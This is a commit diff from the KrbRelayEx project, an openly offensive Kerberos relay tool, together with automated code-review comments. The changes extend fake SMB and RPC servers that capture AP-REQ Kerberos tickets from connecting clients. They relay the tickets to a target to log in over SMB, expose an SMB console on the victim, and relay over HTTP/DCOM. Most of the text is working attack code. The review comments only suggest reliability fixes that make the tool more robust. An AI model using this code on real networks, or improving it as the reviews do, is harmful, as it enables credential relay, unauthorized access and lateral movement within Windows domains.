
Commit bfa435f

author
Andrea Pierini
committed
v 1.0 public
1 parent b172be3 commit bfa435f

10 files changed

Lines changed: 1048 additions & 171 deletions


File renamed without changes.

KrbRelayEx/Clients/Attacks/RPC-DCOM/RPC-DCOM.cs

Lines changed: 470 additions & 0 deletions

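--- a/KrbRelayEx/Clients/Attacks/Smb/SMBSockets.cs
+++ b/KrbRelayEx/Clients/Attacks/Smb/SMBSockets.cs
@@ -12,11 +12,11 @@
 
 public class State
 {
-public Socket SourceSocket { get; }
-public Socket TargetSocket { get; }
+public Socket SourceSocket { get; set; }
+public Socket TargetSocket { get; set; }
 public byte[] Buffer { get; }
 public int numReads = 0;
-
+public IAsyncResult ar;
 public bool isRelayed = false;
 public string ServerType = "";
 public State(Socket sourceSocket, Socket targetSocket)
@@ -25,13 +25,17 @@ public State(Socket sourceSocket, Socket targetSocket)
 TargetSocket = targetSocket;
 Buffer = new byte[4096]; // Adjust buffer size as needed
 }
+public State()
+{
+
+}
 
 }
 class SMBCommandSocketConsole
 {
 
 public byte[] apreqBuffer;
-public FakeSMBServer currSocketServer;
+public FakeRPCServer currSocketServer;
 public async Task Start(int port, State state, byte[] buffer)
 {
 // Define the IP address and port
@@ -41,37 +45,70 @@ public async Task Start(int port, State state, byte[] buffer)
 // Create a TcpListener
 TcpListener listener = new TcpListener(IPAddress.Any, port);
 
+
 try
 {
 // Start the listener
-listener.Start();
-Console.WriteLine("[*] SMB Console Server started on any:{0}. Waiting for connections...", port);
+
+
+
+SMBLibrary.Client.SMB2Client smbc = new SMB2Client();
+//bool success = false;
+bool success = false;
+bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
+
+if (!isConnected)
+{
+Console.WriteLine("[-] Could not connect to [{0}:445]", Program.targetFQDN);
 
+}
+
+smbc.currSourceSocket = state.SourceSocket;
+smbc.currDestSocket = state.TargetSocket;
+//smbc.ServerType = State.ServerType;
+smbc.currSocketServer = currSocketServer;
+smbc.CallID = currSocketServer.CallID;
+smbc.AssocGroup = currSocketServer.AssocGroup;
+smbc.Login(Program.apreqBuffer, out success);
+
+Console.WriteLine("[*] SMB Login status: {0}", success);
+if (!success)
+{
+
+Console.WriteLine("[-] SMB Login Error");
+state.isRelayed = true;
+return;
+}
+
+listener.Start();
+state.isRelayed = false;
+Console.WriteLine("[*] ===> SMB Console Server started on [any:{0}]. Waiting for connections...<===", port);
 //while (true)
 {
 // Accept a client socket
 //Socket clientSocket = listener.AcceptTcpClientAsync(); // AcceptSocket(); //AcceptTcpClientAsync()
 TcpClient clientSocket = await listener.AcceptTcpClientAsync();
-
-
-Console.WriteLine("[*] SMB Console Server connected client:{0}", clientSocket.Client.RemoteEndPoint);
-SMBLibrary.Client.SMB2Client smbc = new SMB2Client();
+
+
+Console.WriteLine("[*] SMB Console Server connected client: [{0}]", clientSocket.Client.RemoteEndPoint);
+//SMBLibrary.Client.SMB2Client smbc = new SMB2Client();
 //smbc.curSocketServer = currSocketServer;
 KrbRelay.Clients.Smb smb2 = new Smb(clientSocket.Client);
-//smbc.currSourceSocket = state.SourceSocket;
-//smbc.currDestSocket = state.TargetSocket;
+smbc.currSourceSocket = state.SourceSocket;
+smb2.alreadyLoggedIn = true;
+smbc.currDestSocket = state.TargetSocket;
 //smbc.ServerType = State.ServerType;
-smbc.curSocketServer = currSocketServer;
-bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
+smbc.currSocketServer = currSocketServer;
+/*bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
 if (!isConnected)
 {
-Console.WriteLine("[-] Could not connect to {0}:445", Program.targetFQDN);
+Console.WriteLine("[-] Could not connect to [{0}:445]", Program.targetFQDN);
 
 }
+*/
 
 
-
-Console.WriteLine("[*] SMB relay Connected to: {0}:445", Program.targetFQDN);
+Console.WriteLine("[*] SMB Console Server client [{0}] relay Connected to: [{1}:445]", clientSocket.Client.RemoteEndPoint, Program.targetFQDN);
 //state.isRelayed = true;
 //Task.Run(() => smb2.smbConnect(smbc));
 Task.Run(() => smb2.smbConnect(smbc, buffer));
@@ -83,14 +120,17 @@ public async Task Start(int port, State state, byte[] buffer)
 }
 catch (Exception ex)
 {
-Console.WriteLine($"Error: {ex.Message}");
+//Console.WriteLine($"SMBSocket Error: {ex.Message}");
+//Console.WriteLine("Stack Trace: " + ex.StackTrace);
 }
 finally
 {
 listener.Stop();
+Program.bgconsoleStartPort--;
 }
 }
 }
+
 public class FakeSMBServer
 {
 private Socket _listenerSocket;
@@ -221,7 +261,7 @@ private void OnClientConnect(IAsyncResult ar)
 // Create a unique key for this connection
 string clientKey = $"{clientSocket.RemoteEndPoint}-{Guid.NewGuid()}";
 
-Console.WriteLine($"[*] FakeSMBServer:{_listenPort} -> Client connected [{clientSocket.RemoteEndPoint}] in {(Program.forwdardmode ? "FORWARD" : "RELAY")} mode.", _listenPort);
+//Console.WriteLine($"[*] FakeSMBServer:{_listenPort} -> Client connected [{clientSocket.RemoteEndPoint}] in {(Program.forwdardmode ? "FORWARD" : "RELAY")} mode.", _listenPort);
 
 // Create a new connection to the target server
 Socket targetSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
@@ -275,18 +315,7 @@ private void OnDataFromClient(IAsyncResult ar)
 state.SourceSocket.Send(smb2NegotiateProtocolResponse, smb2NegotiateProtocolResponse.Length, SocketFlags.None);
 l = state.SourceSocket.Receive(buffer);
 //int ticketOffset = Helpers.PatternAt(buffer, new byte[] { 0x60, 0x82 }); // 0x6e, 0x82, 0x06
-buffer = buffer.Skip(4).ToArray();
-Program.apreqBuffer = Program.ExtractSecurityBlob(buffer);
-if (!(Program.apreqBuffer[0] == 0x60 && Program.apreqBuffer[1] == 0x82))
-{
-Console.WriteLine("[-] FakeSMBServer {0}: Could not find AP-REQ, maybe using NTLM?", state.SourceSocket.RemoteEndPoint);
-state.isRelayed = false;
-
-//CloseConnection(state);
-return;
-
-}
-Console.WriteLine("[*] FakeSMBServer {0}: Got AP-REQ for : {1}/{2}", state.SourceSocket.RemoteEndPoint, Program.service, Program.targetFQDN);
+Console.WriteLine("[*] FakeRPCServer {0}: Got AP-REQ for : {1}/{2}", state.SourceSocket.RemoteEndPoint, Program.service, Program.targetFQDN);
 
 
 
@@ -318,7 +347,7 @@ private void OnDataFromClient(IAsyncResult ar)
 smbc.currSourceSocket = state.SourceSocket;
 smbc.currDestSocket = state.TargetSocket;
 smbc.ServerType = ServerType;
-smbc.curSocketServer = this;
+//smbc.currSocketServer = this;
 bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
 if (!isConnected)
 {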
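Review bot: In `Start`, the `if (!isConnected)` block on new lines 60–64 only prints a message and then falls through to `smbc.Login(...)` on line 72 and to `listener.Start()`, so a client that never connected is still used as if it had; the branch should leave the method the way the login-failure branch on lines 79–80 does, e.g. `return;` right after the WriteLine. The new parameterless `State()` on lines 28–31 leaves `Buffer` null, since `Buffer` is get-only and is assigned only in the two-socket constructor, so any reader of `state.Buffer` on an instance built this way will throw; `Buffer = new byte[4096];` in the new constructor keeps the invariant. The `catch (Exception ex)` on lines 121–125 now has both WriteLine calls commented out and therefore swallows every failure from `Connect`, `Login` and `AcceptTcpClientAsync` without a trace, while `finally` still decrements `Program.bgconsoleStartPort`; keeping at least `Console.WriteLine($"SMBSocket Error: {ex.Message}");` active preserves diagnosability. `Start` is split across the third and fourth hunks, so part of its body is not visible here.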

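--- a/KrbRelayEx/Clients/Attacks/Smb/Shares.cs
+++ b/KrbRelayEx/Clients/Attacks/Smb/Shares.cs
@@ -247,7 +247,7 @@ public static void smbConsole(SMB2Client smbClient, Socket clientSocket = null,
 break;
 
 case "!l":
-Program.SMBtcpFwd.ListConnectedClients();
+//Program.SMBtcpFwd.ListConnectedClients();
 break;
 
 
@@ -667,7 +667,8 @@ public void smbConsole(SMB2Client smbClient, Socket cSocket = null, string share
 }
 else
 {
-Console.WriteLine("[-] Could not connect to {0}", share);
+Console.WriteLine($"[-] Could not connect to {share} : {(status==NTStatus.STATUS_BAD_IMPERSONATION_LEVEL ? "STATUS_BAD_IMPERSONATION_LEVEL" : status)}");
+
 }
 Console.WriteLine("[*] Exiting from {0}", share);
 }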
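Review bot: The conditional inside the interpolation on new line 670 has a `string` in one branch and `status` in the other; if `status` is the `NTStatus` enum (its declaration is outside the hunk), that conditional has no natural type, which older language versions reject outright (CS0173) and newer ones only accept by boxing to `object`. Either way the special case is redundant, because interpolating an enum already prints its member name, so `Console.WriteLine($"[-] Could not connect to {share} : {status}");` produces the same text for every status, including STATUS_BAD_IMPERSONATION_LEVEL. The enclosing `smbConsole` method starts before and ends after this hunk.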

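--- a/KrbRelayEx/Clients/Http.cs
+++ b/KrbRelayEx/Clients/Http.cs
@@ -114,13 +114,10 @@ public static void Connect()
 
 else
 {
-/*
-// MORE PROCESSING REQUIRED
-//DCOM
-
+
+
 apRep1 = Convert.FromBase64String(headerValue);
-Console.WriteLine("[*] Header: {0} ", header.Value);
-
+// /Console.WriteLine("[**] apRep1: {0}", Helpers.ByteArrayToString(apRep1));
 
 byte[] moreArray = new byte[] { 0x05, 0x00, 0x0C, 0x07, 0x10, 0x00, 0x00, 0x00, 0xEE, 0x00, 0xAA, 0x00, 0x03, 0x00, 0x00, 0x00, 0xD0, 0x16, 0xD0, 0x16, 0xF6, 0x15, 0x00, 0x00, 0x04, 0x00, 0x31, 0x33, 0x35, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
 byte[] buffer = new byte[4096];
@@ -144,14 +141,21 @@ public static void Connect()
 outbuffer[12] = Program.CallID[0];
 
 Array.Copy(Program.AssocGroup, 0, outbuffer, 20, 4);
-//Program.stream.Write(outbuffer, 0,outlen);
-Program.currSourceSocket.Send(outbuffer, 0);
+Program.currSourceSocket.Send(outbuffer);
+//Console.WriteLine(Program.HexDump(outbuffer));
+//Console.WriteLine(Program.HexDump(Program.AssocGroup, 16, 4));
+//Console.WriteLine(Program.HexDump(outbuffer,16,24));
+//Program.stream.Write(outbuffer, 0, outlen);
+
 
-//Program.tcpFwd.state.DestinationSocket.Send(outbuffer, outlen, SocketFlags.None);
 
+//int l = Program.stream.Read(buffer, 0, buffer.Length);
+int l = Program.currSourceSocket.Receive(buffer);
+// Program.forwdardmode = true;
+//currSocketServer.state.isRelayed = false;
 
-int l = Program.currDestSocket.Receive(buffer);
-//int l =Program.tcpFwd.state.SourceSocket.Receive(buffer);
+//currSocketServer.CloseConnection(currSocketServer.state);
+
 
 int pattern = KrbRelay.Helpers.PatternAt(buffer, new byte[] { 0xa1, 0x81 });
 int l3 = l - pattern;
@@ -165,9 +169,14 @@ public static void Connect()
 message.Headers.Add("Authorization", cookie);
 message.Headers.Add("Connection", "keep-alive");
 message.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko");
-Console.WriteLine("sending");
+//Console.WriteLine("sending");
 result = httpClient.SendAsync(message).Result;
 }
+Program.forwdardmode = true;
+currSocketServer.state.isRelayed = false;
+
+currSocketServer.CloseConnection(currSocketServer.state);
+
 IEnumerable<string> cookies = null;
 foreach (var h in result.Headers)
 {
@@ -206,10 +215,17 @@ public static void Connect()
 Console.WriteLine("[-] {0}", e);
 }
 
-
+//Program.forwdardmode = true;
+//currSocketServer.state.isRelayed = false;
+//currSocketServer.CloseConnection(currSocketServer.state);
+
+
 return;
-*/
 }
+
+
+
+
 return;
 }
 }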
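Review bot: The result of `Program.currSourceSocket.Receive(buffer)` on new line 153 is used unchecked on lines 160–161: when the peer has closed, `l` is 0, and if `PatternAt` reports the pattern as absent (its not-found value is defined outside this hunk) `l3 = l - pattern` is meaningless and the bytes that follow are consumed as if valid. A guard before the subtraction, such as `if (l <= 0) { return; }` together with a check of `pattern` against the helper's not-found value, with whatever cleanup the surrounding code expects, makes the failure explicit instead of producing a garbage length. The change also activates a block that was previously inside `/* */`, so the blocking `.Result` on context line 173 is now live code as well, and the four blank lines added at 225–228 are noise. `Connect` starts before the first hunk and runs past the last one.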
